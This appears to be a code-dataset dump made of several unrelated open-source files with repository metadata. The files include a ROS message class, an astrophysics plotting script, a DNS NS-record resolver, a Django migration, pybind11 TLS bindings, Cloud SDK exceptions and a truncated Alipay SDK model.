"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"init_version": "0.0.0",
"umask": "18",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/root/tmp",
"unsafe_perm": "",
"link": "",
"prefix": "/usr"
}
}
| [
"root@raspberrypi.(none)"
] | root@raspberrypi.(none) |
d0bf18c817e4f7f237487482234c057de31e6941 | 73189d4d0b39efe5864d25aff07d8338ab8f3110 | /devel/lib/python2.7/dist-packages/tf2_msgs/msg/_LookupTransformFeedback.py | 83b908a2db3ccc30e8952c4719a78f5af29e7c94 | [] | no_license | jungwoohan72/Multi_Robot_Search_And_Rescue | a64590a0f899682c2429400c5cb6d4d8a7d7fd99 | 3e70f9e9b895a96e045f19a05780b091c16f2e60 | refs/heads/main | 2023-07-06T14:03:58.980624 | 2021-08-01T05:15:02 | 2021-08-01T05:15:02 | 379,856,303 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,171 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from tf2_msgs/LookupTransformFeedback.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class LookupTransformFeedback(genpy.Message):
_md5sum = "d41d8cd98f00b204e9800998ecf8427e"
_type = "tf2_msgs/LookupTransformFeedback"
_has_header = False # flag to mark the presence of a Header object
_full_text = """# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
"""
__slots__ = []
_slot_types = []
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(LookupTransformFeedback, self).__init__(*args, **kwds)
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
| [
"dream4future@kaist.ac.kr"
] | dream4future@kaist.ac.kr |
c33136cba8c462e8266f910e5907785846fdc01e | 9c368c9fe78a2dd186daeed2d0714651c1c27d66 | /absorption/ml_project/analyse_spectra/plot_Nweighted_deltaTZ_leg.py | 05d0118c919d27b69595a6456dfdb4603b50129e | [] | no_license | sarahappleby/cgm | 5ff2121919e36b10069692f71fb1dc03f3678462 | 656bf308771dd3ff2f8c2e77107cdc14507c7ce7 | refs/heads/master | 2023-01-24T03:10:01.610418 | 2023-01-20T11:04:31 | 2023-01-20T11:04:31 | 160,820,718 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,422 | py | import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import AutoMinorLocator
import numpy as np
import h5py
import pygad as pg
import sys
plt.rc('text', usetex=True)
plt.rc('font', family='serif', size=15)
if __name__ == '__main__':
model = sys.argv[1]
wind = sys.argv[2]
snap = sys.argv[3]
lines = ["H1215", "MgII2796", "CII1334", "SiIII1206", "CIV1548", "OVI1031"]
plot_lines = ['HI', 'MgII', 'CII', 'SiIII', 'CIV', 'OVI']
line_ev = np.log10([13.6, 15.04, 24.38, 33.49, 64.49, 138.1]) # in eV
adjust_x = [0.015, 0.025, 0.02, 0.025, 0.02, 0.02]
chisq_lim_dict = {'snap_151': [4., 50., 15.8, 39.8, 8.9, 4.5],
'snap_137': [3.5, 28.2, 10., 35.5, 8.0, 4.5],
'snap_125': [3.5, 31.6, 15.8, 39.8, 10., 5.6],
'snap_105': [4.5, 25.1, 25.1, 34.5, 10., 7.1],}
chisq_lim = chisq_lim_dict[f'snap_{snap}']
snapfile = f'/disk04/sapple/data/samples/{model}_{wind}_{snap}.hdf5'
s = pg.Snapshot(snapfile)
redshift = s.redshift
rho_crit = float(s.cosmology.rho_crit(z=redshift).in_units_of('g/cm**3'))
cosmic_rho = rho_crit * float(s.cosmology.Omega_b)
N_min = [12.7, 11.5, 12.8, 11.7, 12.8, 13.2]
zsolar = [0.0134, 7.14e-4, 2.38e-3, 6.71e-4, 2.38e-3, 5.79e-3]
deltath = 2.046913
Tth = 5.
delta_fr200 = 0.25
min_fr200 = 0.25
nbins_fr200 = 5
fr200 = np.arange(min_fr200, (nbins_fr200+1)*delta_fr200, delta_fr200)
idelta = 0.8 / (len(fr200) -1)
icolor = np.arange(0.1, 0.9+idelta, idelta)
cmap = cm.get_cmap('viridis')
colors = [cmap(i) for i in icolor]
plot_dir = '/disk04/sapple/cgm/absorption/ml_project/analyse_spectra/plots/'
sample_dir = f'/disk04/sapple/data/samples/'
with h5py.File(f'{sample_dir}{model}_{wind}_{snap}_galaxy_sample.h5', 'r') as sf:
gal_ids = sf['gal_ids'][:]
mass = sf['mass'][:]
ssfr = sf['ssfr'][:]
fig, ax = plt.subplots(3, 1, figsize=(7, 6.5), sharey='row', sharex='col')
ax = ax.flatten()
for l, line in enumerate(lines):
results_file = f'/disk04/sapple/data/normal/results/{model}_{wind}_{snap}_fit_lines_{line}.h5'
weighted_D = np.zeros(len(fr200))
weighted_D_25 = np.zeros(len(fr200))
weighted_D_75 = np.zeros(len(fr200))
weighted_T = np.zeros(len(fr200))
weighted_T_25 = np.zeros(len(fr200))
weighted_T_75 = np.zeros(len(fr200))
weighted_Z = np.zeros(len(fr200))
weighted_Z_25 = np.zeros(len(fr200))
weighted_Z_75 = np.zeros(len(fr200))
for i in range(len(fr200)):
with h5py.File(results_file, 'r') as hf:
all_Z = hf[f'log_Z_{fr200[i]}r200'][:] - np.log10(zsolar[l])
all_T = hf[f'log_T_{fr200[i]}r200'][:]
all_D = hf[f'log_rho_{fr200[i]}r200'][:] - np.log10(cosmic_rho)
all_N = hf[f'log_N_{fr200[i]}r200'][:]
all_chisq = hf[f'chisq_{fr200[i]}r200'][:]
all_ids = hf[f'ids_{fr200[i]}r200'][:]
mask = (all_N > N_min[l]) * (all_chisq < chisq_lim[l])
all_Z = all_Z[mask]
all_T = all_T[mask]
all_D = all_D[mask]
all_ids = all_ids[mask]
all_N = all_N[mask]
order = np.argsort(all_D)
weighted_D[i] = all_D[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.5))]
weighted_D_25[i] = all_D[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.25))]
weighted_D_75[i] = all_D[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.75))]
order = np.argsort(all_T)
weighted_T[i] = all_T[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.5))]
weighted_T_25[i] = all_T[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.25))]
weighted_T_75[i] = all_T[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.75))]
order = np.argsort(all_Z)
weighted_Z[i] = all_Z[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.5))]
weighted_Z_25[i] = all_Z[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.25))]
weighted_Z_75[i] = all_Z[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.75))]
if i == 0:
ax[0].errorbar(line_ev[l], weighted_D[i], color=colors[i], yerr=np.array([[weighted_D[i] - weighted_D_25[i], weighted_D_75[i] - weighted_D[i],]]).T,
lw=1, ls='None', marker='None', capsize=2)
ax[1].errorbar(line_ev[l], weighted_T[i], color=colors[i], yerr=np.array([[weighted_T[i] - weighted_T_25[i], weighted_T_75[i] - weighted_T[i],]]).T,
lw=1, ls='None', marker='None', capsize=2)
ax[2].errorbar(line_ev[l], weighted_Z[i], color=colors[i], yerr=np.array([[weighted_Z[i] - weighted_Z_25[i], weighted_Z_75[i] - weighted_Z[i],]]).T,
lw=1, ls='None', marker='None', capsize=2)
ax[0].scatter(line_ev[l], weighted_D[i], color=colors[i])
ax[1].scatter(line_ev[l], weighted_T[i], color=colors[i])
if l == 0:
ax[2].scatter(line_ev[l], weighted_Z[i], color=colors[i], label=r'$\rho / r_{{200}} = {{{}}}$'.format(fr200[i]))
else:
ax[2].scatter(line_ev[l], weighted_Z[i], color=colors[i])
ax[0].annotate(plot_lines[l], xy=(line_ev[l] - adjust_x[l], np.min(weighted_D - 0.35)), fontsize=13)
ax[0].axhline(deltath, ls=':', c='k', lw=1)
ax[1].axhline(Tth, ls=':', c='k', lw=1)
ax[2].legend(loc=4, fontsize=12)
ax[0].set_ylim(1, 4.)
ax[1].set_ylim(4, 5.7)
ax[2].set_ylim(-1.75, )
ax[2].set_xlabel(r'${\rm log }(E / {\rm eV})$')
ax[0].set_ylabel(r'${\rm log }\delta$')
ax[1].set_ylabel(r'${\rm log } (T / {\rm K})$')
ax[2].set_ylabel(r'${\rm log} (Z / Z_{\odot})$')
ax[0].xaxis.set_minor_locator(AutoMinorLocator(4))
ax[1].xaxis.set_minor_locator(AutoMinorLocator(4))
plt.tight_layout()
fig.subplots_adjust(wspace=0., hspace=0.)
plt.savefig(f'{plot_dir}{model}_{wind}_{snap}_Nweighted_deltaTZ_chisqion.pdf', format='pdf')
plt.clf()
| [
"sarahappleby20@gmail.com"
] | sarahappleby20@gmail.com |
80e40972cefad943c6a440d4cdb5f832a4e262f0 | 152fc8d9722e9811c0f15f26acf7cd1f82849b2a | /Facebook/move_zeros.py | 163329db6cd3f9cbf7a56edfbae5b805e5f38c2e | [] | no_license | uoojin1/algo_study | 5942bc2ea9f2a752b36db296b42e1636a43c1553 | c5078b377105f092668b594b0d7a297c4422b4a1 | refs/heads/master | 2020-04-13T17:38:05.429046 | 2019-02-07T02:32:24 | 2019-02-07T02:32:24 | 163,352,673 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | ''' move zeros
input: [0,1,0,3,12]
output: [1,3,12,0,0]
1. do this in place, w/o making a copy of the array
2. minimize the number of operations
'''
'''
[0, 1, 0, 3, 12]
^
so basically have a pointer that points to where I should put the next non zero element to
after iterating through the entire array, I should have all the non zero numbers put to the
left side of the array. and the index should point at the start index of 0s to the right
'''
def moveZeros(nums):
index = 0
for num in nums:
if num != 0:
nums[index] = num
index += 1
for i in range(index, len(nums)):
nums[i] = 0
return nums
print moveZeros([0,1,0,3,12,0,5,2,1,70,0,0,3,0,2,1,5]) | [
"uoojin95@gmail.com"
] | uoojin95@gmail.com |
08c1931fd532b86ad3326a6391b1de86663e1372 | 64f81cfd4e588c1b6ead8481b2e35196c2149413 | /obtaining3.58/obtaining_dns_client/resolving_domain_dns/resolving_domain_ns_by_tld2.py | fa5f9e6680c8e0d71df28c3f6b8e606ab86dbbb7 | [] | no_license | JX-Wang/Valid_DNS_verification | b1d7afb14fef78a30d1c21dffe6cf1ce4c5e2dbf | aecf68ca587022449c80b54ec53b43d9ec8dd8f0 | refs/heads/master | 2020-07-28T19:03:16.759597 | 2019-09-19T08:43:30 | 2019-09-19T08:43:30 | 209,502,842 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,858 | py | #encoding:utf-8
"""
通过向各个层次的权威NS地址查询,获取域名的NS记录。
可以配置为在线和离线查询
目前只支持域名是主域名
"""
import dns
import random
import dns.name
import dns.query
import dns.resolver
def get_authoritative_nameserver(domain, offline=False, tld_server = None, default_dns = None, retry_times=1):
"""
通过向各个权威NS发送查询请求,获取域名的NS记录
:param domain: 要查询的域名,目前只支持注册域名的权威查询
:param offline: 是否离线查询,在线表示顶级域名的权威通过配置好的递归服务器获取;离线表示顶级域名的权威地址由输入确定
:param tld_server: 若为离线查询,则tld_server为指定的顶级域名权威IP地址,务必为IP
:param retry_times: 重试次数
:return: rrset ,域名的NS记录
"""
if offline and not tld_server: # 若使用离线数据,但顶级域名权威为空,则输出错误
return '顶级域名权威地址IP不能为空'
n = dns.name.from_text(domain)
if len(n) == 1:
return "域名的顶级域名不存在"
depth = 2
rrset = None
if default_dns:
nameservers = [default_dns, '114.114.114.114', '223.5.5.5','119.29.29.29','180.76.76.76']
else:
nameservers = ['114.114.114.114', '223.5.5.5','119.29.29.29','180.76.76.76']
nameserver = default_dns # 初始化dns
default = dns.resolver.Resolver(configure=False) # 自定义本地递归服务器
default.timeout = 2
random.shuffle(nameservers)
default.nameservers = nameservers
while True:
s = n.split(depth)
last = s[0].to_unicode() == u'@'
sub = s[1]
if len(sub) == 2: # 若为顶级域名,且为offline,则使用指定的顶级域名权威查询域名的ns
if offline:
nameserver = tld_server
depth += 1
continue
# query = dns.message.make_query(sub, dns.rdatatype.NS, use_edns=True) # 增加使用edns
query = dns.message.make_query(sub, dns.rdatatype.NS)
try:
response = dns.query.udp(query, nameserver, timeout=2)
except:
if retry_times:
retry_times = retry_times - 1
if not rrset:
continue
# 重新选择一个ns地址
rrset_cnt = len(rrset) # rrset的大小
random_serial = random.randint(0, rrset_cnt - 1)
rr = rrset[random_serial] # 随机选择一条记录
try:
authority = rr.target
except Exception,e:
return str(e)
try:
nameserver = default.query(authority).rrset[0].to_text()
except:
try:
nameserver = default.query(authority).rrset[0].to_text()
except:
return "resovling nameserver failed"
continue
else:
return 'TIMEOUT'
retry_times = 1 # 若成功,则重新初始化超时重试次数
rcode = response.rcode()
if rcode != dns.rcode.NOERROR:
if rcode == dns.rcode.NXDOMAIN:
# print '%s does not exist.' % sub
return 'NOEXSIT'
else:
return 'Error %s' % dns.rcode.to_text(rcode)
try: # 新增加异常判断
if len(response.authority) > 0:
rrset = response.authority[0]
else:
rrset = response.answer[0]
except Exception, e:
return str(e)
if last:
return rrset
rrset_cnt = len(rrset) # rrset的大小
random_serial = random.randint(0, rrset_cnt-1) # 根据长度,随机选择一个序号
rr = rrset[random_serial] # 随机选择一条记录
if rr.rdtype == dns.rdatatype.SOA:
# print 'Same server is authoritative for %s' % sub
pass
else:
try:
authority = rr.target
except:
return 'authority soa target error'
# print '%s is authoritative for %s' % (authority, sub)
try:
nameserver = default.query(authority).rrset[0].to_text()
except:
try:
nameserver = default.query(authority).rrset[0].to_text()
except:
return "resovling nameserver failed"
depth += 1
def parse_rc_ns(rrset):
"""解析出域名的NS集合"""
ns = []
respond_main_domain = ""
r = str(rrset.to_text())
for i in r.split('\n'):
i = i.split(' ')
rc_type, rc_ttl = i[3], i[1]
if rc_type == 'NS':
ns.append((i[4][:-1]).lower())
respond_main_domain = i[0][:-1]
ns.sort()
return respond_main_domain, ns
def get_domain_ns_hierarchical_dns(main_domain, offline = False, tld_server=None, default_dns=None):
"""按照DNS的分布层级,获取域名NS记录"""
rrset = get_authoritative_nameserver(main_domain,offline,tld_server,default_dns)
if isinstance(rrset, dns.rrset.RRset):
respond_main_domain, ns = parse_rc_ns(rrset)
if main_domain == respond_main_domain:
return [main_domain, ns], 'TRUE'
else:
return [main_domain, []], 'FALSE'
else:
# print '域名: %s, 异常原因:%s' % (domain, rrset)
return [main_domain, []], rrset
if __name__ == '__main__':
domain = 'badoo.com'
print get_domain_ns_hierarchical_dns(domain, offline=True, tld_server='192.26.92.30') #offline模式
domain = 'baidu.com'
print get_domain_ns_hierarchical_dns(domain) # online模式 | [
"1411349759@qq.com"
] | 1411349759@qq.com |
613442e4334b7b1c405168b18116068806fdff41 | c86cb4e5e036a4a591acb8683c9e7023b657fdfe | /breathecode/admissions/migrations/0006_auto_20200703_1951.py | a4d6b94f4dc09df601bd0054def34615ce51c921 | [] | no_license | Joshfishman97/apiv2 | 0fe6c01cb63fafcbaf772ea2fee4b549694d3abf | aee21638748caf7abbd7543bcde95ef74e0bbb7c | refs/heads/master | 2023-08-29T09:21:51.635903 | 2021-10-11T19:52:40 | 2021-10-11T19:52:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | # Generated by Django 3.0.7 on 2020-07-03 19:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('admissions', '0005_auto_20200703_1752'),
]
operations = [
migrations.RemoveField(
model_name='cohort',
name='online_room_url',
),
migrations.AlterField(
model_name='cohort',
name='ending_date',
field=models.DateTimeField(blank=True, null=True),
),
]
| [
"aalejo@gmail.com"
] | aalejo@gmail.com |
38429a573b65366bc1e423cace706d35a5c44f7e | b806f99e96dc6782e5983fa1e3e0df5957cee122 | /src/asiopal/TLSConfig.h | 90550300caabce45b51257e55711e58b8b01cfcd | [
"Apache-2.0"
] | permissive | garretfick/pydnp3 | db1b29e7b1416a102abceaa322a3f9da1336fa55 | 54f7e791bf86a5122e8b734e9d8d64882796cadc | refs/heads/master | 2023-04-06T08:33:59.335065 | 2019-11-30T02:08:45 | 2019-11-30T02:08:45 | 174,612,654 | 4 | 1 | Apache-2.0 | 2023-03-27T09:39:27 | 2019-03-08T21:31:10 | Python | UTF-8 | Python | false | false | 4,996 | h | /*
* -*- coding: utf-8 -*- {{{
* vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
*
* Copyright 2018, Kisensum.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* Neither Kisensum, nor any of its employees, nor any jurisdiction or
* organization that has cooperated in the development of these materials,
* makes any warranty, express or implied, or assumes any legal liability
* or responsibility for the accuracy, completeness, or usefulness or any
* information, apparatus, product, software, or process disclosed, or
* represents that its use would not infringe privately owned rights.
* Reference herein to any specific commercial product, process, or service
* by trade name, trademark, manufacturer, or otherwise does not necessarily
* constitute or imply its endorsement, recommendation, or favoring by Kisensum.
* }}}
*/
#ifndef PYDNP3_ASIOPAL_TLSCONFIG_H
#define PYDNP3_ASIOPAL_TLSCONFIG_H
#include <pybind11/pybind11.h>
#include <Python.h>
#include <asiopal/TLSConfig.h>
#ifdef PYDNP3_ASIOPAL
namespace py = pybind11;
using namespace std;
void bind_TLSConfig(py::module &m)
{
// ----- struct: asiopal:::TLSConfig -----
py::class_<asiopal::TLSConfig>(m, "TLSConfig",
"TLS configuration information.")
.def(
py::init<const std::string&, const std::string&, const std::string&, int, bool, bool, bool, const std::string&>(),
" Construct a TLS configuration. \n"
":param peerCertFilePath: Certificate file used to verify the peer or server. Can be CA file or a "
"self-signed cert provided by other party. \n"
":param localCertFilePath: File that contains the certificate (or certificate chain) that will be "
"presented to the remote side of the connection \n"
":param privateKeyFilePath: File that contains the private key corresponding to the local certificate \n"
":param maxVerifyDepth: The maximum certificate chain verification depth (0 == self-signed only) \n"
":param allowTLSv10: Allow TLS version 1.0 (default false) \n"
":param allowTLSv11: Allow TLS version 1.1 (default false) \n"
":param allowTLSv12: Allow TLS version 1.2 (default true) \n"
":param cipherList: The openssl cipher-list, defaults to empty string which does not modify the default "
"cipher list \n"
"localCertFilePath and privateKeyFilePath can optionally be the same file, i.e. a PEM that contains both "
"pieces of data.",
py::arg("peerCertFilePath"),
py::arg("localCertFilePath"),
py::arg("privateKeyFilePath"),
py::arg("maxVerifyDepth") = 0,
py::arg("allowTLSv10") = false,
py::arg("allowTLSv11") = false,
py::arg("allowTLSv12") = false,
py::arg("cipherList") = ""
)
.def_readwrite(
"peerCertFilePath",
&asiopal::TLSConfig::peerCertFilePath,
"Certificate file used to verify the peer or server. Can be CA file or a self-signed cert provided "
"by other party."
)
.def_readwrite(
"localCertFilePath",
&asiopal::TLSConfig::localCertFilePath,
"File that contains the certificate (or certificate chain) that will be presented to the remote side "
"of the connection."
)
.def_readwrite(
"privateKeyFilePath",
&asiopal::TLSConfig::privateKeyFilePath,
"File that contains the private key corresponding to the local certificate."
)
.def_readwrite(
"maxVerifyDepth",
&asiopal::TLSConfig::maxVerifyDepth,
"Max verification depth (defaults to 0 - peer certificate only)."
)
.def_readwrite(
"allowTLSv10",
&asiopal::TLSConfig::allowTLSv10,
"Allow TLS version 1.0 (default false)."
)
.def_readwrite(
"allowTLSv11",
&asiopal::TLSConfig::allowTLSv11,
"Allow TLS version 1.1 (default false)."
)
.def_readwrite(
"allowTLSv12",
&asiopal::TLSConfig::allowTLSv12,
"Allow TLS version 1.2 (default true)."
)
.def_readwrite(
"cipherList",
&asiopal::TLSConfig::cipherList,
"Openssl format cipher list"
);
}
#endif // PYDNP3_ASIOPAL
#endif
| [
"anhhng141@gmail.com"
] | anhhng141@gmail.com |
7a775527cc467edc8a9e6c6269de9ab5c023c3e2 | 23611933f0faba84fc82a1bc0a85d97cf45aba99 | /google-cloud-sdk/.install/.backup/lib/googlecloudsdk/core/exceptions.py | f84acc69f0dc89dfaf69055e8503fad1847a0204 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | KaranToor/MA450 | 1f112d1caccebdc04702a77d5a6cee867c15f75c | c98b58aeb0994e011df960163541e9379ae7ea06 | refs/heads/master | 2021-06-21T06:17:42.585908 | 2020-12-24T00:36:28 | 2020-12-24T00:36:28 | 79,285,433 | 1 | 1 | Apache-2.0 | 2020-12-24T00:38:09 | 2017-01-18T00:05:44 | Python | UTF-8 | Python | false | false | 3,353 | py | # Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base exceptions for the Cloud SDK."""
import os
from googlecloudsdk.core.util import platforms
class _Error(Exception):
"""A base exception for all Cloud SDK errors.
This exception should not be used directly.
"""
pass
class InternalError(_Error):
"""A base class for all non-recoverable internal errors."""
pass
class Error(_Error):
"""A base exception for all user recoverable errors.
Any exception that extends this class will not be printed with a stack trace
when running from CLI mode. Instead it will be shows with a message of how
the user can correct this problem.
All exceptions of this type must have a message for the user.
"""
def __init__(self, *args, **kwargs):
"""Initialize a core.Error.
Args:
*args: positional args for exceptions.
**kwargs: keyword args for exceptions, and additional arguments:
- exit_code: int, The desired exit code for the CLI.
"""
super(Error, self).__init__(*args)
self.exit_code = kwargs.get('exit_code', 1)
class MultiError(Error):
"""Collection of Error instances as single exception."""
def __init__(self, errors):
super(MultiError, self).__init__(', '.join(str(e) for e in errors))
class RequiresAdminRightsError(Error):
"""An exception for when you don't have permission to modify the SDK.
This tells the user how to run their command with administrator rights so that
they can perform the operation.
"""
def __init__(self, sdk_root):
message = (
u'You cannot perform this action because you do not have permission '
u'to modify the Google Cloud SDK installation directory [{root}].\n\n'
.format(root=sdk_root))
if (platforms.OperatingSystem.Current() ==
platforms.OperatingSystem.WINDOWS):
message += (
'Click the Google Cloud SDK Shell icon and re-run the command in '
'that window, or re-run the command with elevated privileges by '
'right-clicking cmd.exe and selecting "Run as Administrator".')
else:
# Specify the full path because sudo often uses secure_path and won't
# respect the user's $PATH settings.
gcloud_path = os.path.join(sdk_root, 'bin', 'gcloud')
message += (
u'Re-run the command with sudo: sudo {0} ...'.format(gcloud_path))
super(RequiresAdminRightsError, self).__init__(message)
class NetworkIssueError(Error):
"""An error to wrap a general network issue."""
def __init__(self, message):
super(NetworkIssueError, self).__init__(
'{message}\n'
'This may be due to network connectivity issues. Please check your '
'network settings, and the status of the service you are trying to '
'reach.'.format(message=message))
| [
"toork@uw.edu"
] | toork@uw.edu |
132d3a611c7577d20741d725a2e5be24f6cd955a | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/AnttechBlockchainSignIndexCreateModel.py | b024cf20674b77a37b1eb383bfa79e53e90aa35b | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 6,540 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AnttechBlockchainSignIndexCreateModel(object):
def __init__(self):
self._app_name = None
self._biz_corp = None
self._biz_from = None
self._biz_scene = None
self._biz_unique_key = None
self._open_id = None
self._principal_id = None
self._principal_type = None
self._sign_version = None
self._tenant = None
self._valid_end_date = None
self._valid_start_date = None
@property
def app_name(self):
return self._app_name
@app_name.setter
def app_name(self, value):
self._app_name = value
@property
def biz_corp(self):
return self._biz_corp
@biz_corp.setter
def biz_corp(self, value):
self._biz_corp = value
@property
def biz_from(self):
return self._biz_from
@biz_from.setter
def biz_from(self, value):
self._biz_from = value
@property
def biz_scene(self):
return self._biz_scene
@biz_scene.setter
def biz_scene(self, value):
self._biz_scene = value
@property
def biz_unique_key(self):
return self._biz_unique_key
@biz_unique_key.setter
def biz_unique_key(self, value):
self._biz_unique_key = value
@property
def open_id(self):
return self._open_id
@open_id.setter
def open_id(self, value):
self._open_id = value
@property
def principal_id(self):
return self._principal_id
@principal_id.setter
def principal_id(self, value):
self._principal_id = value
@property
def principal_type(self):
return self._principal_type
@principal_type.setter
def principal_type(self, value):
self._principal_type = value
@property
def sign_version(self):
return self._sign_version
@sign_version.setter
def sign_version(self, value):
self._sign_version = value
@property
def tenant(self):
return self._tenant
@tenant.setter
def tenant(self, value):
self._tenant = value
@property
def valid_end_date(self):
return self._valid_end_date
@valid_end_date.setter
def valid_end_date(self, value):
self._valid_end_date = value
@property
def valid_start_date(self):
return self._valid_start_date
@valid_start_date.setter
def valid_start_date(self, value):
self._valid_start_date = value
def to_alipay_dict(self):
params = dict()
if self.app_name:
if hasattr(self.app_name, 'to_alipay_dict'):
params['app_name'] = self.app_name.to_alipay_dict()
else:
params['app_name'] = self.app_name
if self.biz_corp:
if hasattr(self.biz_corp, 'to_alipay_dict'):
params['biz_corp'] = self.biz_corp.to_alipay_dict()
else:
params['biz_corp'] = self.biz_corp
if self.biz_from:
if hasattr(self.biz_from, 'to_alipay_dict'):
params['biz_from'] = self.biz_from.to_alipay_dict()
else:
params['biz_from'] = self.biz_from
if self.biz_scene:
if hasattr(self.biz_scene, 'to_alipay_dict'):
params['biz_scene'] = self.biz_scene.to_alipay_dict()
else:
params['biz_scene'] = self.biz_scene
if self.biz_unique_key:
if hasattr(self.biz_unique_key, 'to_alipay_dict'):
params['biz_unique_key'] = self.biz_unique_key.to_alipay_dict()
else:
params['biz_unique_key'] = self.biz_unique_key
if self.open_id:
if hasattr(self.open_id, 'to_alipay_dict'):
params['open_id'] = self.open_id.to_alipay_dict()
else:
params['open_id'] = self.open_id
if self.principal_id:
if hasattr(self.principal_id, 'to_alipay_dict'):
params['principal_id'] = self.principal_id.to_alipay_dict()
else:
params['principal_id'] = self.principal_id
if self.principal_type:
if hasattr(self.principal_type, 'to_alipay_dict'):
params['principal_type'] = self.principal_type.to_alipay_dict()
else:
params['principal_type'] = self.principal_type
if self.sign_version:
if hasattr(self.sign_version, 'to_alipay_dict'):
params['sign_version'] = self.sign_version.to_alipay_dict()
else:
params['sign_version'] = self.sign_version
if self.tenant:
if hasattr(self.tenant, 'to_alipay_dict'):
params['tenant'] = self.tenant.to_alipay_dict()
else:
params['tenant'] = self.tenant
if self.valid_end_date:
if hasattr(self.valid_end_date, 'to_alipay_dict'):
params['valid_end_date'] = self.valid_end_date.to_alipay_dict()
else:
params['valid_end_date'] = self.valid_end_date
if self.valid_start_date:
if hasattr(self.valid_start_date, 'to_alipay_dict'):
params['valid_start_date'] = self.valid_start_date.to_alipay_dict()
else:
params['valid_start_date'] = self.valid_start_date
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AnttechBlockchainSignIndexCreateModel()
if 'app_name' in d:
o.app_name = d['app_name']
if 'biz_corp' in d:
o.biz_corp = d['biz_corp']
if 'biz_from' in d:
o.biz_from = d['biz_from']
if 'biz_scene' in d:
o.biz_scene = d['biz_scene']
if 'biz_unique_key' in d:
o.biz_unique_key = d['biz_unique_key']
if 'open_id' in d:
o.open_id = d['open_id']
if 'principal_id' in d:
o.principal_id = d['principal_id']
if 'principal_type' in d:
o.principal_type = d['principal_type']
if 'sign_version' in d:
o.sign_version = d['sign_version']
